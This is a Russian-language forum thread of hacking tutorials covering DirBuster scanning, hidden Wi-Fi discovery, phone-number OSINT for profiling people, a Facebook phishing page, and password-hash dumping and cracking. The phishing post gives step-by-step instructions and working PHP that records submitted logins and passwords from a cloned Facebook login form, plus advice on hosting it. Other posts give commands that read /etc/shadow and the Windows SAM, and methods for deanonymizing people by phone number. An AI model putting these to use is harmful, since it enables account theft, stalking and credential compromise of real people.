Dirbuster работает по простому, но эффективному принципу – перебор каталогов и файлов. Он отправляет на целевой веб-сервер шквал запросов, пробуя разные имена каталогов и файлов. Когда он находит совпадение, он предупреждает вас о наличии уязвимостей.

Принцип работы Dirbuster
Начать работу с Dirbuster очень просто. Во-первых, он имеет открытый исходный код, а во-вторых, совместим с различными платформами. Следовательно, вы можете быстро загрузить его и начать сканирование своего сайта в течение нескольких минут.

Одной из сильных сторон Dirbuster является его универсальность. Он позволяет вам настраивать списки слов и расширения, которые вы хотите использовать во время сканирования. Это означает, что вы можете адаптировать сканирование Dirbuster к вашим конкретным потребностям.

Установка Dirbuster
Давайте перейдём к процессу установки. Dirbuster — это инструмент на основе Java, поэтому вам необходимо иметь в вашей системе Java (JRE).

Шаг 1. Установите Java

Если у вас не установлена Java, вы можете загрузить ее с официального сайта Oracle или использовать OpenJDK, популярную альтернативу с открытым исходным кодом.

Шаг 2. Загрузите Dirbuster

Вы можете загрузить инструмент с официального сайта. Убедитесь, что вы скачиваете последнюю версию, обычно предоставляемую в виде файла JAR (архив Java).

Шаг 3. Запустите Dirbuster

После загрузки JAR-файла Dirbuster вы можете запустить его с помощью следующей команды в своем терминале:

java -jar DirBuster-0.12.jar
Замените DirBuster-0.12.jar настоящим именем загруженного вами JAR-файла Dirbuster.

Использование Dirbuster: пошаговое руководство
Теперь, когда у вас есть этот инструмент, давайте посмотрим, как вы можете его использовать.


5d14353a8a1f3dbadd4ab0c66c4dd896.jpg



Шаг 1. Укажите целевой URL-адрес

Чтобы начать сканирование, вам необходимо указать целевой URL-адрес. После -u напишите URL-адрес:

java -jar DirBuster-0.12.jar -u http://пример.com
Шаг 2. Выберите список слов

Выберите список слов для сканирования, используя -l, за которым следует путь к файлу списка слов. Dirbuster предоставляет список слов по умолчанию, но вы также можете создавать собственные словари для настройки сканирования:

java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt
Шаг 3. Запустите сканирование

Чтобы начать сканирование, добавьте -r. Это говорит о том, что инструмент будет исследовать каталоги и файлы:

java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt -r



643cd99207352ca01da4404c1f11f95a.jpg



Дополнительные команды
Dirbuster предлагает несколько дополнительных команд для улучшения сканирования:

1. Сканирование методом перебора: добавьте -b для сканирования методом перебора:

java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt -r -b
2. Выбор протокола: чтобы указать протокол, отличный от HTTP, используйте -p:

java -jar DirBuster-0.12.jar -u ftp://пример.com -l /path/to/словарь.txt -r


0c948d8fa85d77ca847094a42ca0bc10.jpg




3. Сортировка расширений: для сортировки по расширениям используйте -x:

java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt -r -x php,html
Заключение
Dirbuster помогает выявлять и устранять уязвимости до того, как злоумышленники смогут ими воспользоваться. Заблаговременно обнаруживая скрытые каталоги и файлы, он укрепляет защиту вашей цифровой крепости и позволяет оставаться на шаг впереди потенциальных угроз. Не ждите, пока станет слишком поздно. Загрузите Dirbuster уже сейчас, чтобы начать сканирование своего сайта.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Как обнаружить скрытый Wi-Fi с помощью NetSpot

24755884e5bfaab9777fd0e04e1a9110.jpg

Вступить в наш чат
Wi-Fi – самый распространенный на сегодня стандарт беспроводной связи. Но он достаточно уязвим ко многим вариантам атак – от DDoS до компрометации ключа или PIN-кода. Многие пользователи стараются защитить свою сеть от взлома, сделав её скрытой. Однако, это не означает, что их нельзя обнаружить. Сегодня мы покажем вам, как найти все беспроводные сети, транслирующиеся в вашем районе, в том числе те, которые скрыли свой SSID.
a21d459194f517e67176e5355a73a6b2.jpg

Что такое скрытая сеть
Все сети WI-FI передают идентификатор набора служб (SSID) каждые 100 миллисекунд, чтобы другие устройства знали об их присутствии. Некоторые роутеры не передают свой SSID, поскольку на них включена опция скрытой сети. Эта опция останавливает трансляцию SSID сети, в результате чего он исчезает и становится невидимым для всех устройств, подключающихся к сетям Wi-Fi.

Как обнаружить скрытые сети
То, что скрытые сети не видны невооруженным взглядом, не означает, что их нельзя обнаружить. Они взаимодействуют с другими сетями, поэтому их можно обнаружить с помощью сетевого сканера Wi-Fi под названием NetSpot.

NetSpot — бесплатное приложение, анализатор беспроводных сетей, способный мгновенно собрать всю информацию обо всех сетях Wi-Fi, транслируемых в вашем районе.

Мы приготовили пошаговое руководство по обнаружению скрытых Wi-Fi сетей с помощью NetSpot.

Шаг 1. Загрузите и установите NetSpot. Приложение работает на iPhone, Android, macOS и Windows. Вам просто нужно скачать NetSpot бесплатную версию с их официального сайта.

b191da7613969f14f6485e91e550db2a.jpg


После загрузки установите приложение, следуя инструкциям. Затем запустите приложение.

Шаг 2. Запуск NetSpot. Когда вы запустите NetSpot, вы увидите предложение обновиться до версии Pro. Просто нажмите «Продолжить», и вы сможете использовать приложение бесплатно.

c84e132928c50c3c34854dae9efc25b0.jpg


Шаг 3. Анализ сетей. Приложение начнет анализировать все беспроводные сети в вашем районе, после чего вы увидите следующую информацию по каждой сети:

BSSID или имя сети.
Мощность сигнала.
Используемый тип шифрования.
Производитель роутера.
Диапазон беспроводной связи, в котором излучается сигнал, используемый канал и ширина частотного канала (20, 40 или 80 МГц)

de3bc17a197820628aced6a55b744b10.jpg


Шаг 4. Анализ сетей Wi-Fi. Прокрутите список SSID WiFi и посмотрите, что обнаружил NetSpot. Запишите те сети, которые вас интересуют. Затем на ноутбуке или ПК с Windows щелкните на значок Wi-Fi на панели задач. Вы увидите список всех беспроводных сетей, которые не скрыты.

bbac3ed5cfd8ba58d258a89916ecdfe4.jpg


Сравните список SSID в NetSpot со списком SSID, отображаемых в Windows. В нашем районе Netspot обнаружил в общей сложности 22 SSID. Для сравнения, ОС Windows обнаружила только 12 беспроводных сетей. Десять беспроводных сетей в нашем районе скрыты. Мы смогли увидеть о них всевозможную интересную информацию. Например, мы знаем, какой тип шифрования они используют, стандарт беспроводной сети, используемый для трансляции сигнала Wi-Fi (802.11ac/n/b/g), и когда сети были обнаружены в последний раз.

Как исследовать обнаруженную скрытую сеть
Вы можете использовать NetSpot для исследования скрытой сети Wi-Fi, которую мы обнаружили. Для этого:

Подключитесь к скрытой сети.
Откройте NetSpot и войдите в режим «Survey mode».

165c66df1f7ab50b2051e15808276d65.jpg


3. Добавьте скрытую сеть.

527d24655082f2f2cc2b51f09f0aef92.jpg


4. Нажмите «Продолжить».

5. Проанализируйте результаты.

990292cab325f11dad7552114d9c33bb.jpg


Заключение
Если вы дочитали эту статью до конца, то теперь точно знаете, как обнаружить скрытый Wi-Fi с помощью NetSpot. Приложение работает на iPhone, Android, macOS и Windows. Вы можете использовать его для проведения анализа сети Wi-Fi, проверив различные параметры: SSID, BSSID, канал, диапазон, протокол безопасности, поставщик, уровень сигнала и многое другое. Теперь вы можете использовать NetSpot для поиска скрытых сетей в вашем районе, экспериментируя с его функциями. Удачи!​
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
OSINT: пробиваем человека по номеру телефона

OSINT: пробиваем человека по номеру телефона
CENTER]



Вступить в наш чат​
OSINT или сбор информации из открытых источников становится все более популярным способом узнать о человеке ценную информацию. С широким распространением смартфонов и интернета номера телефонов стали ключевым идентификатором, который может быть использован для раскрытия огромного количества информации о пользователе. В статье расскажем об инструменте PhoneInfoga, с помощью которого OSINT по номеру телефона станет проще, чем когда-либо. Поехали!
CENTER]


Анализ телефонных номеров
Одним из первых шагов при проведении OSINT по номеру телефона является сбор следующей информации: оператор связи, местоположение и тип линии. Анализируя эти данные о телефоне, вы можете получить важную информацию о привычках человека, например о том, где он живет и работает. Найти информации по номеру телефона можно разными способами: вручную используя поисковики, телеграм-боты для пробива, сервисы типа TrueCaller и с помощью специальных утилит. Об одной из таких мы поговорим далее.

Социальные сети

Номера телефонов также можно использовать для раскрытия личности человека в социальных сетях. Путем поиска номера телефона на таких платформах, как VK, Facebook, Instagram, можно идентифицировать учетные записи человека в социальных сетях. Как только личность будет деанонимизирована, вы сможете собрать дополнительную информацию об онлайн-активности и интересах человека.

Государственные архивы

Номера телефонов также можно использовать для поиска в общедоступных записях. Например, для поиска судебных протоколов, записей о собственности и других юридических документов. Это может дать ценную информацию о финансовом положении и других аспектах личной и профессиональной жизни.

Пробив по номеру с помощью PhoneInfoga
PhoneInfoga — один из самых продвинутых инструментов для анализа телефонных номеров с использованием бесплатных ресурсов. Цель состоит в том, чтобы сначала собрать стандартную информацию, такую ​​как страна, область, оператор и тип линии, по любым международным телефонным номерам с очень хорошей точностью. Затем найти следы в поисковых системах, которые могут привести к владельцу. PhoneInfoga использует платформы с открытым исходным кодом, их API-интерфейсы и даже инструменты Google для получения значимой и актуальной информации о номере телефона. PhoneInfoga автоматизирует этот процесс и это очень облегчает поиск.

Установка PhoneInfoga на Kali Linux
Прежде всего, вам нужно клонировать его, а затем установить все зависимости.
Установите с github:
git clone https://github.com/sundowndev/PhoneInfoga.git
Зайдите в папку с утилитой:
cd PhoneInfoga/
Сделайте его исполняемым:
****d +x phoneinfoga.py
Установите requirements
python3 -m pip install -r requirements.txt
Запустите:
python3 phoneinfoga.py --help

https://i.gyazo.com/cbe234633e334e057434ef520b8d3be1.jpg

Всего 7 флагов.

-h - Справка.
--help
-n - Вводить номер телефона для сканирования.
--number
-i - Использовать файл с несколькими номерами.
--input
-o - Сохранить результат сканирования.
--output
-s - Сканировать.
--scanner
--osint - Использовать осинт.
-u - Обновить утилиту.
--update
Протестируем утилиту.

В качестве теста, мы будем использовать номер: 88005553535.

Российские номера указываются в формате +7. Для иностранных номеров: +код страны.

Использование флага -n.
python3 phoneinfoga.py -n +78005553535

a4b3f471916ab0cf0d9ba9bae728499d.jpg


Использование флага --osint и -s.
python3 phoneinfoga.py -n +78005553535 -s all --osint

CENTER]

Далее интрумент запросит, хотите ли вы искать отпечатки. Ответ положительный.

CENTER]

После этого в игру вступает Google. Но, чтобы увидеть результаты поиска, вам нужно пройти капчу.

https://i.gyazo.com/68b89c8a32a65dfe08b08c28daf19b7b.png

Нажмите на выделенную ссылку и отправляйтесь в ваш браузер. Пройдите капчу и нажмите F12. Кликните по вкладке Хранилище (Storage), вкладка куки (Cookies). Там найдите большими бувами GOOGLE_ABUSE_EXEMPTION. Теперь вам нужны те cookies, где есть значение ID=.

CENTER]

Скопируйте вместе с ID= и вставьте в ваш терминал. Жмите Enter. И поиск продолжится.

Помимо этого, вы можете добавить соц.сети в утилиту. Для этого используйте команду:

Зайдите в папку osint.
cd osint/

CENTER]


Вы увидите файл social_medias.json. Отредактируйте его следующим образом:

CENTER]


Скопируйте сегмент от первой фигурной скобки до такой же замыкающей. Поставьте запятую после крайней замыкающей скобки, вставьте скопированное и напишите желаемое имя домена вместо указанного. После крайней замыкающей красной скобки, запятую уже не ставьте. Сохраните.

Теперь Phoneinfoga полностью настроен и готов к работе.

Заключение
OSINT по номеру телефона становится все более популярным методом пробива в последние годы из-за широкой доступности данных в интернете. Однако, важно отметить, что этот метод не лишен ограничений. Например, некоторые пользователи могут иметь незарегистрированные номера телефонов или предпринимать иные шаги по сокрытию своей личной информации в сети. Кроме того, точность и надежность онлайн-источников данных могут сильно различаться. Чтобы преодолеть эти ограничения, вы можете использовать комбинацию методов, которую предоставляете утилита Phoneinfoga. Тогда OSINT по номеру телефона сможет стать поистине эффективным методом сбора информации о человеке.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Как создать фишинговую страницу для взлома Facebook

Как создать фишинговую страницу для взлома Facebook

3d3f5255013cad14868581d265d78948.jpg



Вступить в наш чат
Хотите узнать, как хакеры создают фишинговую страницу для взлома? Мы покажем вам два метода: один — простой для новичков, которые хотят просто протестировать взлом, а второй — для тех, кто хочет научиться взлому и пентесту, а также создать свою собственную фишинговую страницу Facebook.

18b00f473b6894329563a8103600cf63.jpg


Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Простой способ взлома
Загрузите файлы взлома: для мобильных телефонов и для компьютеров (лучше отдать предпочтение ПК)
Бесплатный хостинг: 000webhost. При желании вы можете использовать любой хостинг, но в этой статье мы будем использовать именно этот.
Как создать фишинговую страницу Facebook
Шаг 1. Перейдите на сайт 000webhost и нажмите «Зарегистрироваться», используя любой адрес электронной почты (это БЕСПЛАТНО). Очень важно подтвердить свой адрес электронной почты, чтобы ваша учетная запись была активной.

7db0b26b3fa45baac23469d582f8667a.jpg



Шаг 2. В конце регистрации установите пароль и выберите название сайта, подходящее для вашей фишинговой страницы.

Шаг 3. После проверки вашего адреса электронной почты выберите «Диспетчер файлов», а затем нажмите «Загрузить файлы сейчас».

Шаг 4. Теперь вы будете перенаправлены на файловый менеджер вашего сайта, как показано ниже:

661a616c399212b1b18c2d2dc1a19f0d.jpg


Шаг 5. Откройте папку public_html. Загрузите оба файла index.html и post.php, нажав значок загрузки в правом углу файлового менеджера.

Шаг 6. Перейдите к списку сайтов на панели и скопируйте адрес ссылки на свой сайт, который вы ранее создали. «Домен, который был создан хостингом».

Шаг 7. Как только целевой пользователь войдет на сайт, вы увидите в файловом менеджере следующий файл с именем username.txt. Откройте его, чтобы увидеть логин и пароль учетной записи.


6e31ac1387dcd546fa732d14607f09dd.jpg


Готово, вы успешно научились взламывать аккаунт Facebook с помощью фишинга.

А теперь покажем продвинутый метод для тех, кто хочет изучить все технические детали взлома Facebook вручную.

Продвинутый способ взлома
Сейчас вы узнаете, как создавать собственную фишинговую страницу Facebook вручную.

Шаг 1. Откройте facebook.com. Чтобы создать фишинговую страницу, перейдите на официальный сайт Facebook и щелкните правой кнопкой мыши пустую область. Вы увидите множество опций, вам нужно нажать на опцию просмотра исходной страницы.

Шаг 2. Создание копии страницы Facebook. Когда вы нажмете на просмотр исходного кода страницы, откроется новая вкладка, показывающая весь код. Это исходный код страницы Facebook.

82f54dc68f9de75832fa9566a54c87e4.jpg


Сейчас мы будем его редактировать для создания фишинговой страницы Facebook. Для этого: выделите весь код, скопируйте и вставьте его в блокнот и сохраните файл как index.htm. Расширение файла — .htm, а не .html. Не допускайте этой ошибки.

Шаг 3. Отредактируйте исходный код. Теперь откройте блокнот, в который вы вставили этот код, нажмите CTRL+F и введите ACTION в строке поиска. Далее найдите следующую строку в коде:

action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"
Когда вы найдете код, указанный выше, удалите всё после слова action и замените словом post.php, как показано ниже:

action="post.php"
Шаг 4. Сохраните код в новую папку с именем index.htm. Итак, вы завершили первую часть фишинговой страницы.

Шаг 5. Создание файла PHP. Чтобы создать вторую часть фишинговой страницы Facebook, вам необходимо создать файл PHP. В качестве примера мы будем использовать наш файл под названием post.php. Если вы планируете использовать другое имя, обязательно измените его и в index.htm. Откройте новый файл блокнота, скопируйте приведенный ниже код и сохраните его под именем post.php.

<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Шаг 6. Сохраните фишинговые файлы Facebook вместе.Теперь вы успешно создали два файла, которые следует сохранить в одной папке.

index.htm
post.php
Шаг 7. Создайте учетную запись на бесплатном хостинге. Перейдите на сайт 000webhost и нажмите кнопку «Зарегистрироваться», используя любой адрес электронной почты. Очень важно подтвердить свой адрес электронной почты, чтобы ваша учетная запись была активной.

Шаг 8. Откройте файловый менеджер и загрузите файлы. После откройте Cpanel на панели управления вашего хостинга. Выберите файловый менеджер и нажмите «Диспетчер файлов», чтобы перейти в папку public_html.

Шаг 9. Загрузите index.htm и post.php. Нажмите кнопку «Загрузить файлы» и загрузите оба файла, которые вы ранее сохранили.

Шаг 10. Убедитесь, что все фишинговые файлы загружены, а затем откройте свой сайт. Перед вами будет обычная, на первый взгляд, страница Facebook, но когда вы увидите URL-адрес, вы поймете, что это фишинговая страница.

Шаг 11. Перейдите к списку сайтов на панели и скопируйте адрес ссылки на свой сайт, который вы ранее создали.

Шаг 12. Как только целевой пользователь войдет на сайт, вы увидите в файловом менеджере файл с именем username.txt. Откройте его, чтобы узнать логин и пароль.

Поздравляем, вы научились взламывать аккаунт Facebook с помощью собственной фишинговой страницы.

Заключение
Сегодня вы узнали не только, как хакеры взламывают Facebook и другие учетные записи социальных сетей с помощью фишинговых URL-адресов, но и посмотрели на этот процесс с изнанки. Надеемся, что статья оказалась полезной для вас. Обязательно проверяйте URL-адреса, прежде чем переходить по каким-либо ссылкам. На этом все. Удачи!
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Что такое хэширование: извлекаем хэши паролей с помощью ОС Windows и Linux

Что такое хэширование: извлекаем хэши паролей с помощью ОС Windows и Linux


c459f88176b27dc97d6eb974670fd083.jpg



Вступить в наш чат
Большинство начинающих пентестеров не понимают, как извлекать хэши паролей. Однако, извлечение заветных хешей — это далеко не все, что нужно знать перед тем, как начинать взлом. Также необходимо разобраться, что вообще из себя представляет хэширование паролей. В этом руководстве мы подробно расскажем как происходит взлом любых паролей с технической стороны. Готовы? Тогда поехали!

41f1a220e2f5bb1348b0aa017d5e7086.jpg

Что такое хэширование паролей
Процесс хеширования используется для хранения паролей и конфиденциальных данных на компьютерах, тем самым обеспечивая безопасность данных. Проще говоря, большинство сайтов используют алгоритм хеширования для шифрования и управления паролями. Для наглядности давайте посмотрим на следующие примеры хэшей:

хэш(«привет»)=2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824
хэш("пьивет")=58756879c05c68dfac9866712fad6a93f8146f337a69afe7dd238f3364946366
Мы специально показали, как выглядят хэши на примере двух слов «привет», за исключением того факта, что второе слово написано с опечаткой в 1 букву. Результат получился совсем иным, не так ли? Таким образом, можно сделать вывод, что если входные данные изменятся хотя бы на один бит, хэш в конченом итоге будет совершенно другим, как вы можете увидеть на примере выше.

А теперь давайте посмотрим, как выглядит процесс регистрации учетной записи на основе хэша.

В качестве примера возьмем ВКонтакте. При создании нового аккаунта нужно заполнить поля, содержащие информацию о вашем имени, email, номере телефона, дате рождения, а также придумать пароль. После того, как вы нажали «зарегистрироваться», ваши данные уходят в серверную базу данных ВКонтакте, в которой ваше имя, email, номер телефона, дата рождения сохраняются в первоначальном виде.

А как же пароль? В базе данных сайта пароль никогда не хранится в виде открытого текста. Ваш пароль представляет собой исходные данные для алгоритма хэширования, на выходе которого мы получаем пароль в зашифрованном виде. Зашифрованный пароль может показаться набором случайных букв и цифр, но это не так. Хэш пароля хранится в базе данных Вконтакте. Это означает, что введенный вами пароль будет хранится в базе данных не в открытой, а в зашифрованной форме, доступа к которой у злоумышленников не будет.

Итак, что будет делать хакер теперь?
Получение хэшей паролей Linux
В операционной системе Linux теневой файл хранит хэшированные и защищенные пароли. Кроме того, вы не можете просматривать файлы напрямую, как обычные файлы.

Чтобы получить доступ к скрытым хэшам, введите следующую команду:

unshadow /etc/passwd /etc/shadow > crack.txt
unshadow — это команда Linux, которая извлекает хэши паролей. Как вы можете видеть, хэши будут сохранены в файле Crack.txt.

Извлечение хэшей паролей Windows
Pwdump — это потрясающий инструмент для взлома, который может помочь вам получить хэши секретных паролей LM и NTLM учетных записей.

Загрузите pwdump на компьютер с Windows. Мы покажем на примере pwdump7. Так, просто используя этот инструмент, мы можем получить хэши паролей Windows из базы данных SAM.

Откройте терминал и введите следующую команду в каталоге pwdump7.

pwdump7 > hash.txt
Программа извлекает и сохраняет хэши в файле с именем hash.txt.

Итак, хакеры извлекли хэши, но не смотря на это они не смогут зайти в аккаунты пользователей, так как полученный ими пароль зашифрован. Если хакер попробует зайти в аккаунт пользователя с помощью хэша пароля, доступ в аккаунт открыт не будет. Для доступа необходима ввести пароль в форме текста.

Следующим шагом будет использование Hash Identifier или John the Ripper, о котором мы расскажем в следующей части.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Извлекаем хэши паролей с помощью John The Ripper

Извлекаем хэши паролей с помощью John The Ripper

ffd1756ab575a7be5e43e02700813c75.jpg


Вступить в наш чат[/CENTER]
Большинство начинающих пентестеров не понимают, как извлекать хэши паролей. И поэтому сегодня мы расскажем, как это сделать с помощью инструмента John The Ripper.

56c68f5e9d3cd8cbf1c496e719063e8e.jpg


В прошлой статье мы говорили о том, что такое хэширование. Если вы еще не читали её, то советуем начать именно с неё. А теперь давайте коротко вспомним, что означает этот термин.

Хэширование – это процесс преобразования данных (в нашем случае паролей) в зашифрованную строку для обеспечения безопасности. Хэш - это набор случайных символов, который генерируется на основе текстового пароля с помощью специального алгоритма хэширования, что позволяет защитить пароль от взлома и улучшить его безопасность. Даже если злоумышленник получит доступ к базе данных паролей, он не сможет прочитать их в открытом виде и использовать для входа в систему. Так как же все-таки расшифровать полученные хэши? Что ж, у Джонни есть ответ, который вам нужен.

Установка
Представляем Johnny — кроссплатформенный графический интерфейс с открытым исходным кодом для популярного взломщика паролей John the Ripper, который доступен в Kali Linux. Но вы также можете установить его и в Windows, для этого просто скачайте программу установки с официального сайта.

Цель Джонни — автоматизировать и упростить взлом паролей с помощью универсального инструмента John the Ripper, а также добавить к нему дополнительные функции, в том числе и удобный графический интерфейс, а еще множество атак и улучшенный рабочий процесс хэширования.

Далее вам понадобится установочный файл John the Ripper, который вы можете скачать здесь. Теперь откройте и установите Джонни, как и любое другое приложение. Как только вы закончите с этим, вам нужно настроить инструмент. Для этого распакуйте John the Ripper в папку.

Используйте настройки, чтобы соединить Джона Потрошителя и Джонни вместе.

56a244d4620f3c4b4fa25842be089df1.jpg


Теперь, когда оба инструмента подключены друг к другу, мы можем приступить к взлому хэшей паролей.

В этом демонстрационном руководстве мы будем использовать список DEFCON, содержащий хэшированные пароли, которые нам нужно взломать. Он имеет более 50 000 паролей учетных записей, которые мы взломаем менее чем за 2 часа.

Итак, поехали!

Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Шаг 1. Импортируем хэши

Запустите Johnny и импортируйте хэши с помощью опции для открытия файла паролей.

Шаг 2. Ищем список слов

Загрузите хороший словарь из Интернета. Мы будем использовать список слов из двух миллиардов возможных паролей, который вы можете скачать отсюда.

Шаг 3. Выбираем список слов

Перейдите в раздел «Wordlist» и выберите загруженный список слов.

Шаг 4. Выбираем типа хэша

Теперь по умолчанию для взлома будет автоматически выбран наиболее часто используемый тип хэша - sha1, но вы также можете настроить тип вручную. После нажмите «Начать атаку», и должен начаться взлом пароля.



d89e223d2c152c4a7f53a67a2bb5bbe2.jpg


Шаг 5. Меняем тип хэша

После того, как вы взломали все возможные хэши одного типа, нужно ввести другой тип хеша и снова продолжить взлом.

Наберитесь терпения. В нашем случае на взлом 50.000 паролей ушло 2 часа. Но если у вас более мощный компьютер, то получится и быстрее.

Так как же все это работает?

Что ж, происходит следующее: Джонни автоматизировал процесс взлома паролей и, используя наш список слов, начал сравнивать хэши паролей с хэшами, присутствующими в списке задач. Стоит отметить, что пароли были далеко не из простых, но тем не менее, мы их смогли легко взломать. Иначе говоря, если у вас есть надежный список слов, то вы можете взломать практически любой пароль.

Как защитить свой пароль от взлома
Остерегайтесь фишинговых атак;
Используйте двухфакторную аутентификацию для всего, чем вы только пользуетесь;
Создайте пароль длиной не менее 12 символов. Чем больше пароль, тем сложнее его взломать;
Проверьте, не была ли когда-либо скомпрометирована ваша электронная почта. Для этого зайдите на этот сайт.
Будьте бдительны и совершенствуйте свои знания, читая наши статьи.
 
Назад
Сверху